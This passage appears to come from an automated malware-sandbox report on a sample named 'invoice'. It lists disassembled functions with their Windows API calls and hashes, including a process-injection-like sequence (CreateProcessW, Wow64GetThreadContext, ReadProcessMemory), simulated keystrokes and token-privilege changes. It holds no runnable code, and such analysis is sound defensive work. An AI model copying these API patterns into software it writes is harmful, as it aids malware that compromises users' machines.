                          • Part of subcall function 00FA6D8E: __lock.LIBCMT ref: 00FA6DB1
                        • __fclose_nolock.LIBCMT ref: 00FA5566
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                        • String ID:
                        • API String ID: 2800547568-0
                        • Opcode ID: fb03a7bacf542d59d5b087ff94ebe8b2ae20578700888014fef1c8f3282e60c3
                        • Instruction ID: 4f96dfc239128a6b0d95def00ded2c6f9e2d53bed78eaa7a09e9a120b27006a6
                        • Opcode Fuzzy Hash: fb03a7bacf542d59d5b087ff94ebe8b2ae20578700888014fef1c8f3282e60c3
                        • Instruction Fuzzy Hash: F7F090F1D01A01AED710AB758C0276E76A26F43775F288209F464AB1C1CBBC9A02BB51
                        Function 0152C895 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 0152D053
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0152D0E9
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0152D10B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                        • Instruction ID: f5033139db73803e956fc1d8e4306a821da0cfc5f0745bf403287de90aa6ce54
                        • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                        • Instruction Fuzzy Hash: 2512EE24E18658C6EB24DF64D8507DEB232FF68300F1090E9D10DEB7A5E77A5E81CB5A
                        Function 00FA0D88 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction ID: e6457553a15d225e6e7b0a3f320f629aa69ff9969c2755d51133ab0ddcb2e7b1
                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction Fuzzy Hash: 6231B7B5A001059FC718DF58E4C4A69FBA6FF4A310B6486A5E409CB255DF31EDD1EB80
                        Function 00FC0005 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 7d8c08cf8817e87c13e3313b613558701c69cbe0b0053d7051a0a36c9bcbd094
                        • Instruction ID: 0e7474f37adfe5b2ee09fb0b20f2ebf746e31f88982a466e26972f44a73acf18
                        • Opcode Fuzzy Hash: 7d8c08cf8817e87c13e3313b613558701c69cbe0b0053d7051a0a36c9bcbd094
                        • Instruction Fuzzy Hash: D741F775908341CFDB24DF14C484B5ABBE0FF45318F1988ACE8958B762C736E846DB52
                        Function 00F87CB3 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 7d6f510797fd83e004306c6ccfe9b33ee9071dde48a88281e1839a6a3e2f3f88
                        • Instruction ID: 5df01290494adc7fe317fdfa8af60e7c3f8a52466f2d50ee1477b9ce8f4683e8
                        • Opcode Fuzzy Hash: 7d6f510797fd83e004306c6ccfe9b33ee9071dde48a88281e1839a6a3e2f3f88
                        • Instruction Fuzzy Hash: D72133B2A04608EBCB246F22FC417E97BB8FF14390F21842EE486C50A5EB35D490BB54
                        Function 00F84F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F84D13: FreeLibrary.KERNEL32(00000000,?), ref: 00F84D4D
                          • Part of subcall function 00FA53CB: __wfsopen.LIBCMT ref: 00FA53D6
                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84F6F
                          • Part of subcall function 00F84CC8: FreeLibrary.KERNEL32(00000000), ref: 00F84D02
                          • Part of subcall function 00F84DD0: _memmove.LIBCMT ref: 00F84E1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Library$Free$Load__wfsopen_memmove
                        • String ID:
                        • API String ID: 1396898556-0
                        • Opcode ID: a9f7bd83fb377cf679f0cb23ecfaf012e68c7ef19ba5e0891a8704055c68b71a
                        • Instruction ID: 00400d54c3113286a420fbaa05eddac3cd3814033f8d2ba809c43fdd23caff75
                        • Opcode Fuzzy Hash: a9f7bd83fb377cf679f0cb23ecfaf012e68c7ef19ba5e0891a8704055c68b71a
                        • Instruction Fuzzy Hash: 8411C43260070BABCB21FF61CC12FEE77A99F40714F10881DF541A7181EAB9AA05BB61
                        Function 00FC00DE Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 21d4e4f4b9c08e5c3e9317fd09b92c22d38eceefbc25137f27391add8b39ae7a
                        • Instruction ID: da1c5a0fbbc3160688735ef85c9a2d93f185230311c60a83b49e657bdc721542
                        • Opcode Fuzzy Hash: 21d4e4f4b9c08e5c3e9317fd09b92c22d38eceefbc25137f27391add8b39ae7a
                        • Instruction Fuzzy Hash: E22113B1908342CFDB24EF14C844B5ABBE0FF89314F05896CE89657761DB35E805EB92
                        Function 00F87F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 934396340b51902128352361dc00ee99dd049bb3fb4110ca6547e3f261a09c37
                        • Instruction ID: 4720afb3608d1c872f5c46dc5bdc19246322b24a43a794d924e4f1cdce28dfe4
                        • Opcode Fuzzy Hash: 934396340b51902128352361dc00ee99dd049bb3fb4110ca6547e3f261a09c37
                        • Instruction Fuzzy Hash: 7D01FEB36047017ED3206F39DC06F67B7A4DB45760F10852DF61ACA1D1DA75E400A790
                        Function 00FA49D3 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                        • __lock_file.LIBCMT ref: 00FA4A16
                          • Part of subcall function 00FA8CA8: __getptd_noexit.LIBCMT ref: 00FA8CA8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __getptd_noexit__lock_file
                        • String ID:
                        • API String ID: 2597487223-0
                        • Opcode ID: 645d9c321f071568f073f67a8fb08b13bc205dca28935730304c19c757f93c7e
                        • Instruction ID: 8999609af01521a03cb80f4a35b8e7cfa7cebffc2ada3f00594dcda483e9e457
                        • Opcode Fuzzy Hash: 645d9c321f071568f073f67a8fb08b13bc205dca28935730304c19c757f93c7e
                        • Instruction Fuzzy Hash: 3AF0C2B2940206EBDF11AFB4CC0639F76A1AF823A5F048514F424AA191DBFC9A11FF55
                        Function 00F84FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                        Download Yara Rule
                        APIs
                        • FreeLibrary.KERNEL32(?,?,010452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84FDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: 3360d72af0d6583d8a3e3296255e7215abd6b6c5a4dc692a7f139b38c70e403f
                        • Instruction ID: c2aa863ff7a45f2894b09e086c9abe0da0f20572ff71c5ca719355d5a84da8db
                        • Opcode Fuzzy Hash: 3360d72af0d6583d8a3e3296255e7215abd6b6c5a4dc692a7f139b38c70e403f
                        • Instruction Fuzzy Hash: 27F03971905723CFCB34AF64E494992BBE1BF153293248A3EE2D683A10C736A840EF40
                        Function 00FA0911 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FA0930
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: LongNamePath_memmove
                        • String ID:
                        • API String ID: 2514874351-0
                        • Opcode ID: 7a086cf437e535c1813dde95391c57876a00c95cf18c008b973ceb84a9fcb5e3
                        • Instruction ID: 8239b05aa2f22b5da7c2928de0a99cb31f2c138bdbff959b273b7c9d9d2e7f43
                        • Opcode Fuzzy Hash: 7a086cf437e535c1813dde95391c57876a00c95cf18c008b973ceb84a9fcb5e3
                        • Instruction Fuzzy Hash: 65E0863690522857C721E6589C05FEA77EDDF88690F0401B5FC4CD7209D969AC819690
                        Function 00FA53CB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __wfsopen
                        • String ID:
                        • API String ID: 197181222-0
                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction ID: e25c8597bdb12d69ec1f47225631b10aac1ae319af24afbb86da151725326150
                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction Fuzzy Hash: 9AB092B644020C77CE012A82EC02A493B9A9B81BA4F408020FF0C181A2A6B7A660A689
                        Function 0152D894 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 0152D8A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                        • Instruction ID: 7e6839f2d5aafb874ea1192cbbdf64aa2458be9c14d352f6313d7cba2cde3ace
                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                        • Instruction Fuzzy Hash: 01E09A7594010DEFDB00DFA8D54969D7BB4EF04301F1005A1FD0596680DA709A548A62
                        Function 0152D898 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 0152D8A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction ID: 44320836179a92197e4883e33c10e56a04ecf38a318245b32d291427bd0259d1
                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction Fuzzy Hash: 09E0E67594010DEFDB00DFF8D54969D7BB4FF04301F100161FD05D2280D6709D508A62

                        Non-executed Functions

                        Function 0100CB26 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0100CBA1
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0100CBFF
                        • GetWindowLongW.USER32(?,000000F0), ref: 0100CC40
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0100CC6A
                        • SendMessageW.USER32 ref: 0100CC93
                        • _wcsncpy.LIBCMT ref: 0100CCFF
                        • GetKeyState.USER32(00000011), ref: 0100CD20
                        • GetKeyState.USER32(00000009), ref: 0100CD2D
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0100CD43
                        • GetKeyState.USER32(00000010), ref: 0100CD4D
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0100CD76
                        • SendMessageW.USER32 ref: 0100CD9D
                        • SendMessageW.USER32(?,00001030,?,0100B37C), ref: 0100CEA1
                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0100CEB7
                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0100CECA
                        • SetCapture.USER32(?), ref: 0100CED3
                        • ClientToScreen.USER32(?,?), ref: 0100CF38
                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0100CF45
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0100CF5F
                        • ReleaseCapture.USER32 ref: 0100CF6A
                        • GetCursorPos.USER32(?), ref: 0100CFA4
                        • ScreenToClient.USER32(?,?), ref: 0100CFB1
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0100D00D
                        • SendMessageW.USER32 ref: 0100D03B
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0100D078
                        • SendMessageW.USER32 ref: 0100D0A7
                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0100D0C8
                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0100D0D7
                        • GetCursorPos.USER32(?), ref: 0100D0F7
                        • ScreenToClient.USER32(?,?), ref: 0100D104
                        • GetParent.USER32(?), ref: 0100D124
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0100D18D
                        • SendMessageW.USER32 ref: 0100D1BE
                        • ClientToScreen.USER32(?,?), ref: 0100D21C
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0100D24C
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0100D276
                        • SendMessageW.USER32 ref: 0100D299
                        • ClientToScreen.USER32(?,?), ref: 0100D2EB
                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0100D31F
                          • Part of subcall function 00F825DB: GetWindowLongW.USER32(?,000000EB), ref: 00F825EC
                        • GetWindowLongW.USER32(?,000000F0), ref: 0100D3BB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                        • String ID: @GUI_DRAGID$F
                        • API String ID: 3977979337-4164748364
                        • Opcode ID: 374555ac6d117181228c78b9d2b1959c6d5ff817038dc3db0336ec1baa1c41e7
                        • Instruction ID: 052982dbe5a74f0f26c943b94c64c3941877e3f0015734cd55c6dc5a14019d46
                        • Opcode Fuzzy Hash: 374555ac6d117181228c78b9d2b1959c6d5ff817038dc3db0336ec1baa1c41e7
                        • Instruction Fuzzy Hash: 39429C74204701AFF722DF68C984AAABBE5FF49310F140A99F6D5972E1CB36D840DB52
                        Function 00F970FE Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove$_memset
                        • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                        • API String ID: 1357608183-1798697756
                        • Opcode ID: 51625138eabe6053f3bec6c1be0b81681d6492675a1512dbb46466ab40a2eaa9
                        • Instruction ID: 4b47114f729699ac211d049b1b09651736a93072db0ec3764a5a4f19fb28651f
                        • Opcode Fuzzy Hash: 51625138eabe6053f3bec6c1be0b81681d6492675a1512dbb46466ab40a2eaa9
                        • Instruction Fuzzy Hash: 9B938175E043159BDF24DF58D881BADB7B2FF48720F28816AE945AB380E7749D81EB40
                        Function 00F84A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32(00000000,?), ref: 00F84A3D
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FBD9BE
                        • IsIconic.USER32(?), ref: 00FBD9C7
                        • ShowWindow.USER32(?,00000009), ref: 00FBD9D4
                        • SetForegroundWindow.USER32(?), ref: 00FBD9DE
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FBD9F4
                        • GetCurrentThreadId.KERNEL32 ref: 00FBD9FB
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FBDA07
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FBDA18
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FBDA20
                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00FBDA28
                        • SetForegroundWindow.USER32(?), ref: 00FBDA2B
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBDA40
                        • keybd_event.USER32(00000012,00000000), ref: 00FBDA4B
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBDA55
                        • keybd_event.USER32(00000012,00000000), ref: 00FBDA5A
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBDA63
                        • keybd_event.USER32(00000012,00000000), ref: 00FBDA68
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBDA72
                        • keybd_event.USER32(00000012,00000000), ref: 00FBDA77
                        • SetForegroundWindow.USER32(?), ref: 00FBDA7A
                        • AttachThreadInput.USER32(?,?,00000000), ref: 00FBDAA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                        • String ID: Shell_TrayWnd
                        • API String ID: 4125248594-2988720461
                        • Opcode ID: 49383d8119ee142e9848f9232a1e7bd7625e7c6b0cfbe696c808f43f7f3a07e7
                        • Instruction ID: 55da554902ff093ecd4e6db173e99ee0a481c0e299fb493ab2f795f94db83a96
                        • Opcode Fuzzy Hash: 49383d8119ee142e9848f9232a1e7bd7625e7c6b0cfbe696c808f43f7f3a07e7
                        • Instruction Fuzzy Hash: CC316271A403197BEB316FA29C49FBE7E6CEB44B51F104015FA04EA1C1DAB65901BFA1
                        Function 00FD8638 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FD8AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FD8AED
                          • Part of subcall function 00FD8AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FD8B1A
